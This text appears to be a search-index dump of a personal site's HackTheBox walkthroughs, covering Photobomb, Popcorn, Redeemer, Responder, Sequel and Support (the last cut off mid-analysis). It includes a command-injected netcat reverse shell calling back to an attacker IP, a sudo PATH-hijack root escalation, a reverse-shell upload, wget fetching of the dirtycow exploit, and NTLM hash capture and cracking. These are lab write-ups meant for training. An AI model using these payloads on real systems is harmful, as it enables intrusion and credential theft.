    POST /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nOrigin: http://photobomb.htb\nAuthorization: Basic cEgwdDA6YjBNYiE=\nConnection: close\nReferer: http://photobomb.htb/printer\nUpgrade-Insecure-Requests: 1\n\nphoto=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000\n

    Playing a little with this request in BurpSuite (module Repeater) we can infer that the site is using ruby as a programming language. Now we can play a little with the three parameters we have in the request (photo, filetype, and dimensions) and discover that for some reason filetype is injectable. We can add either a reverse shell in ruby or a reverse shell with netcat. Python doesn't work for us here. I go for an nc reverse shell and url-encode it like this:

    POST /printer HTTP/1.1\nHost: photobomb.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 164\nOrigin: http://photobomb.htb\nAuthorization: Basic cEgwdDA6YjBNYiE=\nConnection: close\nReferer: http://photobomb.htb/printer\nUpgrade-Insecure-Requests: 1\n\nphoto=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=png;rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.80+24444+>/tmp/f&dimensions=3000x2000\n

    Now, in the attacker machine (mine is 10.10.14.80), we listen on port 24444:

    nc -lnvp 24444\n
    Once we have the attacker machine listening, we go back to the repeater module in Burp Suite and launch the attack with the SEND button. We will obtain a reverse shell in the attacker machine.

    After that, we run:

    whoami\ncat /home/wizard/user.txt\n
    to get the user flag: *****

    ","tags":["walkthrough"]},{"location":"htb-photobomb/#getting-the-system-flag","title":"Getting the system flag","text":"

    We run some basic commands:

    id\n
    Results:
    uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)\n
    echo $SHELL\n
    Results:
    /bin/bash\n
    uname -a\n
    Results:
    Linux photobomb 5.4.0-126-generic #142-Ubuntu SMP Fri Aug 26 12:12:57 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux\n
    sudo -l\n

    Results:

    Matching Defaults entries for wizard on photobomb:\n    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser wizard may run the following commands on photobomb:\n    (root) SETENV: NOPASSWD: /opt/cleanup.sh\n

    Two interesting things here: 1. Our user can modify environmental variables, and 2. Our user can execute /opt/cleanup.sh as root with no need for a password. Having a look at the /opt/cleanup.sh file, we can see the command \"find\" invoked with a relative path:

    #!/bin/bash\n. /opt/.bashrc\ncd /home/wizard/photobomb\n\n# clean up log files\nif [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]\nthen\n  /bin/cat log/photobomb.log > log/photobomb.log.old\n  /usr/bin/truncate -s0 log/photobomb.log\nfi\n\n# protect the priceless originals\nfind source_images -type f -name '*.jpg' -exec chown root:root {} \\;\n
    Knowing that we can modify environmental variables, we are going to create a find file with execution permissions in our folder, and then we are going to add our folder in the first position of the $PATH environmental variable. With that we will execute /opt/cleanup.sh and escalate to root.

    cd ~\necho bash > find\nchmod +x find\nsudo PATH=$PWD:$PATH /opt/cleanup.sh\n
    Now, we are root:

    id\n

    Results:

    uid=0(root) gid=0(root) groups=0(root)\n

    And the flag:

    cat root.txt\n
    Results: *******

    ","tags":["walkthrough"]},{"location":"htb-popcorn/","title":"Popcorn - A HackTheBox machine","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-usertxt","title":"Flag user.txt","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#reconnaissance","title":"Reconnaissance","text":"
    nmap -sC -sV -Pn 10.10.10.6 -p-\n

    Result:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 3ec81b15211550ec6e63bcc56b807b38 (DSA)\n|_  2048 aa1f7921b842f48a38bdb805ef1a074d (RSA)\n80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))\n|_http-title: Site doesn't have a title (text/html).\n|_http-server-header: Apache/2.2.12 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#enumeration","title":"Enumeration","text":"
    dirb http://10.10.10.6 /usr/share/wordlists/dirb/common.txt\n

    First result:

    ---- Scanning URL: http://10.10.10.6/ ----\n+ http://10.10.10.6/.bash_history (CODE:200|SIZE:320) \n+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:286)         + http://10.10.10.6/index (CODE:200|SIZE:177)            + http://10.10.10.6/index.html (CODE:200|SIZE:177)       + http://10.10.10.6/server-status (CODE:403|SIZE:291)    + http://10.10.10.6/test (CODE:200|SIZE:47330)           ==> DIRECTORY: http://10.10.10.6/torrent/                \n

    Browsing to http://10.10.10.6/.bash_history you can get how to escalate privileges later on:

    Looks like someone exploited a dirty cow vulnerability here. La la la la.

    But let's browse the directory http://10.10.10.6/torrent/

    Browsing around we can identify a login page at http://popcorn.htb/torrent/login.php. This login page is vulnerable to SQLi.

    We can use sqlmap to dump users' database:

    sqlmap --url http://popcorn.htb/torrent/login.php --data=\"username=lele&password=lalala\" -D torrenthoster -T users --dump --batch\n

    Here, someone created a user before me:

    But since registering is open, we will create our own user to login into the application.

    Once you are logged in, browse around. There exist a panel to upload your torrents.

    Play with it. No reverse shell is allowed. But there is also another panel to edit an existing upload:

    The screenshot file is not properly sanitized. Try to upload a pentesmonkey, but capturing it with Burpsuite. Modify the content-type header to \"image/png\" and...

    Reverse shell is uploaded. Get your netcat listening on port 1234 (or other):

    nc -lnvp 1234\n

    Click on button \"Image File not Found\" and... bingo! You have a shell on your listener.

    Spawn your shell.

    python -c 'import pty; pty.spawn(\"/bin/bash\")'\n

    Get user's flag in /home/george/user.txt

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-popcorn/#flag-roottxt","title":"Flag root.txt","text":"

    From previous user of the machine we know that this machine has probably a dirtycow vulnerability. But we can server from our machine the script LinPEAS.

    Now in the victim's machine:

    wget http://<attacker IP>/linpeas.sh\nchmod +x linpeas.sh\n./linpeash.sh\n

    Results:

    \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Executing Linux Exploit Suggester\n\u255a https://github.com/mzet-/linux-exploit-suggester                                                                         \n[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson                                                                \n\n   Details: http://vulnfactory.org/exploits/full-nelson.c\n   Exposure: highly probable\n   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}\n   Download URL: http://vulnfactory.org/exploits/full-nelson.c\n\n[+] [CVE-2016-5195] dirtycow\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04\n   Download URL: https://www.exploit-db.com/download/40611\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2016-5195] dirtycow 2\n\n   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails\n   Exposure: probable\n   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}\n   Download URL: https://www.exploit-db.com/download/40839\n   ext-url: https://www.exploit-db.com/download/40847\n   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2010-3904] rds\n\n   Details: http://www.securityfocus.com/archive/1/514379\n   Exposure: probable\n   Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},[ ubuntu=10.10|9.10 ],fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic}\n   Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c\n\n[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson\n\n   Details: https://www.exploit-db.com/exploits/17787/\n   Exposure: probable\n   Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}\n   Download URL: https://www.exploit-db.com/download/17787\n\n[+] [CVE-2010-1146] reiserfs\n\n   Details: https://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/\n   Exposure: probable\n   Tags: [ ubuntu=9.10 ]\n   Download URL: https://jon.oberheide.org/files/team-edward.py\n\n[+] [CVE-2010-0832] PAM MOTD\n\n   Details: https://www.exploit-db.com/exploits/14339/\n   Exposure: probable\n   Tags: [ ubuntu=9.10|10.04 ]\n   Download URL: https://www.exploit-db.com/download/14339\n   Comments: SSH access to non privileged user is needed\n\n[+] [CVE-2021-3156] sudo Baron Samedit\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: mint=19,ubuntu=18|20, debian=10\n   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-3156] sudo Baron Samedit 2\n\n   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: less probable\n   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10\n   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main\n\n[+] [CVE-2021-22555] Netfilter heap out-of-bounds write\n\n   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html\n   Exposure: less probable\n   Tags: ubuntu=20.04{kernel:5.8.0-*}\n   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c\n   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c\n   Comments: ip_tables kernel module must be loaded\n\n[+] [CVE-2019-18634] sudo pwfeedback\n\n   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/\n   Exposure: less probable\n   Tags: mint=19\n   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c\n   Comments: sudo configuration requires pwfeedback to be enabled.\n\n[+] [CVE-2017-6074] dccp\n\n   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3\n   Exposure: less probable\n   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}\n   Download URL: https://www.exploit-db.com/download/41458\n   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass\n\n[+] [CVE-2017-5618] setuid screen v4.5.0 LPE\n\n   Details: https://seclists.org/oss-sec/2017/q1/184\n   Exposure: less probable\n   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154\n

    The second dirty cow works just fine: https://www.exploit-db.com/exploits/40839

    Serve it from your attacker machine. And from victim's:

    wget http://<atacker machine>/40839.c\n\n\n# Compile with:\ngcc -pthread 40839.c -o dirty -lcrypt\n\n# Then run the newly create binary by either doing:\n./dirty\n# or\n./dirty <my-new-password>\n

    Now, sudo su to the given user from the script. And you will be that user (substituting root).

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-redeemer/","title":"Walkthrough - A HackTheBox machine - Redeemer","text":"

    Enumerate open ports/services:

    nmap -sC -sV $ip -Pn -p-\n

    Results:

    ```PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 5.0.7

    See [6379 Redis Cheat sheet](6379-redis.md).\n\n\n## Exploitation\n\n```bash\n\u2514\u2500$ redis-cli -h 10.129.136.187 -p 6379         \n10.129.136.187:6379> INFO keyspace\n# Keyspace\ndb0:keys=4,expires=0,avg_ttl=0\n(0.60s)\n10.129.136.187:6379> select 0\nOK\n10.129.136.187:6379> keys *\n1) \"temp\"\n2) \"numb\"\n3) \"flag\"\n4) \"stor\"\n10.129.136.187:6379> get flag\n\"03e1d2b376c37ab3f5319922053953eb\"\n

    ","tags":["walkthrough","redis"]},{"location":"htb-responder/","title":"Responder - A HackTheBox machine","text":"
    nmap -sC -A 10.129.95.234 -Pn -p-\n

    Open ports: 80,

    Browsing at port 80, we are redirected to http://unika.htb so we will add this to /etc/host.

    sudo echo \"10.129.95.234    unika.htb\" >> /etc/hosts\n

    After that, we can browse the web and wander around.

    There is a LFI - Local File Inclusion vulnerability at endpoint http://unika.htb/index.php?page=french.html. This is request in Burpsuite:

    GET /index.php?page=../../../../../../../../windows/win.ini HTTP/1.1\nHost: unika.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nReferer: http://unika.htb/index.php?page=french.html\nUpgrade-Insecure-Requests: 1\n

    From previous responses we know that we face a php server version 8.1.1 running on Windows, so we can use some payloads for interesting windows files. In this case, we would need some crafting to remove the \"c:/\" part. We can do it with the \"cut\" command.

    We are going to use the tool Responder.py to get the NTLM hash from server. Basically the idea is to mount a SMB server on our attacker machine with the responder tool. Responder is able to get the NTLM hash from server.

    git clone https://github.com/lgandx/Responder.git   \ncd Responder\nsudo pip install -r requirements.txt\n./Responder.py -I tun1 -w -d\n

    From browser enter: http://unika.htb//index.php?page=///whatever. In my case:

    http://unika.htb/index.php?page=//10.10.14.2/lalala\n

    Now, from the Responder prompt we will have the hash:

    [SMB] NTLMv2-SSP Client   : 10.129.95.234\n[SMB] NTLMv2-SSP Username : RESPONDER\\Administrator\n[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\n

    The NetNTLMv2 includes both the challenge (random text) and the encrypted response.

    # Save hash in a file\necho \"Administrator::RESPONDER:fc1a74919a1b08cc:E6E626FD4B1C4F7ECCAA0EE0840EE704:010100000000000000DC82F5CA7DD901B25F22A9A23BC4C3000000000200080042005A004F00340001001E00570049004E002D00500042004E004B00360051003400500058004E004F0004003400570049004E002D00500042004E004B00360051003400500058004E004F002E0042005A004F0034002E004C004F00430041004C000300140042005A004F0034002E004C004F00430041004C000500140042005A004F0034002E004C004F00430041004C000700080000DC82F5CA7DD9010600040002000000080030003000000000000000010000000020000091174BB6757D2A344D7B5A8B18DC80E22F176A01524CE0739D703C3593CB66640A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000\" > hash.txt\n

    Crack it with John the Ripper.

    john -w=/usr/share/wordlists/rockyou.txt hash.txt\n

    Results:

    Using default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbadminton        (Administrator)     \n1g 0:00:00:00 DONE (2023-05-03 14:51) 50.00g/s 204800p/s 204800c/s 204800C/s 123456..oooooo\nUse the \"--show --format=netntlmv2\" options to display all of the cracked passwords reliably\nSession completed. \n

    So password for Administrator is badminton.

    Also, from Responder we have this output:

    Using default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])\nWill run 8 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nbadminton        (Administrator) \n

    Now, we will connect to the WinRM (Windows Remote Management service) on the target and try to get a session. For that there is a tool called Evil-WinRM.

    evil-winrm -i <VictimIP> -u <username> -p <password>\n\n# In my case: \nevil-winrm -i 10.129.95.234 -u Administrator -p badminton\n

    You will get a powershell session. Browse around to find flag.txt.

    To echo it:

    type c:/users/mike/Desktop/flag.txt\n
    ","tags":["walkthrough","NTLM credential stealing","responder.py","local file inclusion","php include","web pentesting"]},{"location":"htb-sequel/","title":"Sequel - A HackTheBox machine","text":"
    nmap -sC -A 10.129.95.232 -Pn\n

    Results:

    Nmap scan report for 10.129.95.232\nHost is up (0.044s latency).\nNot shown: 999 closed tcp ports (conn-refused)\nPORT     STATE SERVICE VERSION\n3306/tcp open  mysql?\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1\n|   Thread ID: 91\n|   Capabilities flags: 63486\n|   Some Capabilities: SupportsLoadDataLocal, LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, FoundRows, SupportsTransactions, DontAllowDatabaseTableColumn, ODBCClient, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolNew, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: d7$M6g&&+DSV7PkJptwz\n|_  Auth Plugin Name: mysql_native_password\n

    Connect to database: mariadb

    mariadb -h 10.129.95.232 -u root\n
    MariaDB [(none)]> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| htb                |\n| information_schema |\n| mysql              |\n| performance_schema |\n+--------------------+\n4 rows in set (0.049 sec)\n\nMariaDB [(none)]> use htb;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\nDatabase changed\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.046 sec)\n\n\nMariaDB [htb]> show tables;\n+---------------+\n| Tables_in_htb |\n+---------------+\n| config        |\n| users         |\n+---------------+\n2 rows in set (0.047 sec)\n\n\nMariaDB [htb]> show columns from config;\n+-------+---------------------+------+-----+---------+----------------+\n| Field | Type                | Null | Key | Default | Extra          |\n+-------+---------------------+------+-----+---------+----------------+\n| id    | bigint(20) unsigned | NO   | PRI | NULL    | auto_increment |\n| name  | text                | YES  |     | NULL    |                |\n| value | text                | YES  |     | NULL    |                |\n+-------+---------------------+------+-----+---------+----------------+\n3 rows in set (0.046 sec)\n\n\nMariaDB [htb]> select id, name, value from config;\n+----+-----------------------+----------------------------------+\n| id | name                  | value                            |\n+----+-----------------------+----------------------------------+\n|  1 | timeout               | 60s                              |\n|  2 | security              | default                          |\n|  3 | auto_logon            | false                            |\n|  4 | max_size              | 2M                               |\n|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |\n|  6 | enable_uploads        | false                            |\n|  7 | authentication_method | radius                           |\n+----+-----------------------+----------------------------------+\n7 rows in set (0.046 sec)\n
    ","tags":["walkthrough","sql","port 3306","mariadb"]},{"location":"htb-support/","title":"Walkthrough - Support, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-support/#about-the-machine","title":"About the machine","text":"data Machine Support Platform Hackthebox url link creator 0xdf OS Windows Release data 30 July 2022 Difficulty Easy Points 20 ip 10.10.11.174","tags":["walkthrough"]},{"location":"htb-support/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

    Run:

    export ip=10.10.11.174\n
    ","tags":["walkthrough"]},{"location":"htb-support/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-support/#service-port-enumeration","title":"Service/ Port enumeration","text":"

    Run nmap to enumerate open ports, services, OS, and traceroute. Do a general enumeration not to make too much noise:

    sudo nmap $ip -Pn\n

    Results:

    Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE\n53/tcp   open  domain\n88/tcp   open  kerberos-sec\n135/tcp  open  msrpc\n139/tcp  open  netbios-ssn\n389/tcp  open  ldap\n445/tcp  open  microsoft-ds\n464/tcp  open  kpasswd5\n593/tcp  open  http-rpc-epmap\n636/tcp  open  ldapssl\n3268/tcp open  globalcatLDAP\n3269/tcp open  globalcatLDAPssl\n\nNmap done: 1 IP address (1 host up) scanned in 7.90 seconds\n

    Once you know open ports, run nmap to see service versions and more details:

    sudo nmap -sCV -p3,88,135,139,389,445,464,593,636,3268,3269 $ip\n

    Results:

    Nmap scan report for 10.10.11.174\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE       VERSION\n53/tcp   open  domain        Simple DNS Plus\n88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-08 15:56:45Z)\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n445/tcp  open  microsoft-ds?\n464/tcp  open  kpasswd5?\n593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636/tcp  open  tcpwrapped\n3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)\n3269/tcp open  tcpwrapped\nService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-time:\n|   date: 2022-11-08T15:56:49\n|_  start_date: N/A\n| smb2-security-mode:\n|   3.1.1:\n|_    Message signing enabled and required\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 49.69 seconds\nzsh: segmentation fault  sudo nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 $ip\n

    A few facts that you can gather after running this scan are: + There is a Windows Server running an Active Directory LDAP in the machine. + ldap and kerberos are available. + Domain: support.htb0.

    ","tags":["walkthrough"]},{"location":"htb-support/#enumerate","title":"Enumerate","text":"

    Now, we can perform some basic enumeration to gather data about the target.

    enum4linux 10.10.11.174\n

    Among the lines in the results, you can see these interesting lines:

    =========================================( Target Information )=========================================\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===================================( Session Check on 10.10.11.174 )===================================    \n[+] Server 10.10.11.174 allows sessions using username '', password ''\n\n================================( Getting domain SID for 10.10.11.174 )================================             \nDomain Name: SUPPORT                                                                     \nDomain Sid: S-1-5-21-1677581083-3380853377-188903654\n

    Using the tool kerbrute, we will enumerate some valid usernames in the active directory:

    (kali\u327fkali)-[~/tools/kerbrute/dist]\n\u2514\u2500$ ./kerbrute_linux_amd64 userenum -d support --dc 10.10.11.174 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\n

    Results:

        __             __               __     \n   / /_____  _____/ /_  _______  __/ /____\n  / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\\n / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/\n/_/|_|\\___/_/  /_.___/_/   \\__,_/\\__/\\___/                                        \n\nVersion: dev (9cfb81e) - 11/09/22 - Ronnie Flathers @ropnop\n\n2022/11/09 05:16:54 >  Using KDC(s):\n2022/11/09 05:16:54 >   10.10.11.174:88\n\n2022/11/09 05:16:56 >  [+] VALID USERNAME:  support@support\n2022/11/09 05:16:57 >  [+] VALID USERNAME:  guest@support\n2022/11/09 05:17:03 >  [+] VALID USERNAME:  administrator@support\n2022/11/09 05:17:52 >  [+] VALID USERNAME:  Guest@support\n2022/11/09 05:17:53 >  [+] VALID USERNAME:  Administrator@support\n2022/11/09 05:19:42 >  [+] VALID USERNAME:  management@support\n2022/11/09 05:19:59 >  [+] VALID USERNAME:  Support@support\n2022/11/09 05:20:52 >  [+] VALID USERNAME:  GUEST@support\n2022/11/09 05:31:02 >  [+] VALID USERNAME:  SUPPORT@support\n

    The same thing we did with kerbrute, we could have done it with dnsrecon.

    Samba service is open so we can try to enumerate the shares provided by the host:

    # -L looks at what services are available on a target and -N forces the tool not to ask for a password\nsmbclient -L //$ip -N\n

    Results:

            Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share\n        support-tools   Disk      support staff tools\n        SYSVOL          Disk      Logon server share\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n
    ","tags":["walkthrough"]},{"location":"htb-support/#initial-access","title":"Initial access","text":"

    After trying to connect to ADMIN$, C$, we connect to the share \"support-tools\":

    smbclient /\\\\10.10.11.174/\\support-tools\n

    This way, we obtain a prompt command line in samba (smb: >). Typing help in that command line you can see which commands you can execute.

    Also, we list the content in the folder:

    dir\n

    Results:

    smb: \\> dir\n  .                                   D        0  Wed Jul 20 13:01:06 2022\n  ..                                  D        0  Sat May 28 07:18:25 2022\n  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022\n  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022\n  putty.exe                           A  1273576  Sat May 28 07:20:06 2022\n  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022\n  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022\n  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022\n  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022\n\n                4026367 blocks of size 4096. 968945 blocks available\n

    Also, we check permissions on the share and we learn that we only have read permissions. Now we are going to retrieve all these files to pay close attention. Among the commands you can execute you have mget. So we run:

    mget *\n

    This will download all the files to the local folder from where you initiated your samba connection. Close the connection:

    quit\n

    Now, have a close look at the files we have downloaded. Unzip UserInfo.exe.zip file:

    unzip UserInfo.exe.zip\n

    After unzipping UserInfo.exe.zip, you have two files: UserInfo.exe and UserInfo.exe.config. Run:

    cat UserInfo.exe.config\n

    Result:

    <?xml version=\"1.0\" encoding=\"utf-8\"?>\n<configuration>\n    <startup>\n        <supportedRuntime version=\"v4.0\" sku=\".NETFramework,Version=v4.8\" />\n    </startup>\n  <runtime>\n    <assemblyBinding xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n      <dependentAssembly>\n        <assemblyIdentity name=\"System.Runtime.CompilerServices.Unsafe\" publicKeyToken=\"b03f5f7f11d50a3a\" culture=\"neutral\" />\n        <bindingRedirect oldVersion=\"0.0.0.0-6.0.0.0\" newVersion=\"6.0.0.0\" />\n      </dependentAssembly>\n    </assemblyBinding>\n  </runtime>\n</configuration>\n

    From this, we can know that UserInfo.exe is a binary assembled with the .NETFramework. Basically, this executable appears to be used to pull user information, likely from Active Directory. Now, if we want to go further in our inspection we will need a .NET decompiler for Linux. Here we have several options.

    Since it's open source and we are using a kali virtual machine to perform this penetration test, let's use ILSpy, but you can have a look at alternative tools at the end of this walkthrough. To run ILSpy, you need to install it before. Also, it has some dependencies like: .NET 6.0 SDK, Avalonia, dotnet... Install what you are asked and when done, run:

    cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n

    Open UserInfo.exe in the program and inspect the code. There are several parts in the code:

    • References
    • {}
    • {} UserInfo
    • {} UserInfo.Commands
    • {} UserInfo.Services

    In the UserInfo.Services you can find the LdadQuery():

    using System.DirectoryServices;\n\npublic LdapQuery()\n{\n    //IL_0018: Unknown result type (might be due to invalid IL or missing references)\n    //IL_0022: Expected O, but got Unknown\n    //IL_0035: Unknown result type (might be due to invalid IL or missing references)\n    //IL_003f: Expected O, but got Unknown\n    string password = Protected.getPassword();\n    entry = new DirectoryEntry(\"LDAP://support.htb\", \"support\\\\ldap\", password);\n    entry.set_AuthenticationType((AuthenticationTypes)1);\n    ds = new DirectorySearcher(entry);\n}\n

    From where we stand, we can understand that LdapQuery() function is used to login into the Active Directory with the user \"support\". As a password, it calls the getPassword() function. Let's click on that function in the code to see it:

    public static string getPassword()\n{\n    byte[] array = Convert.FromBase64String(enc_password);\n    byte[] array2 = array;\n    for (int i = 0; i < array.Length; i++)\n    {\n        array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);\n    }\n    return Encoding.Default.GetString(array2);\n}\n

    Here we can see the necessary steps that we will need to reverse the password if, in the end, we are able to retrieve it. Now, let's click on two function calls: \"enc_password\" and the private function \"key\".

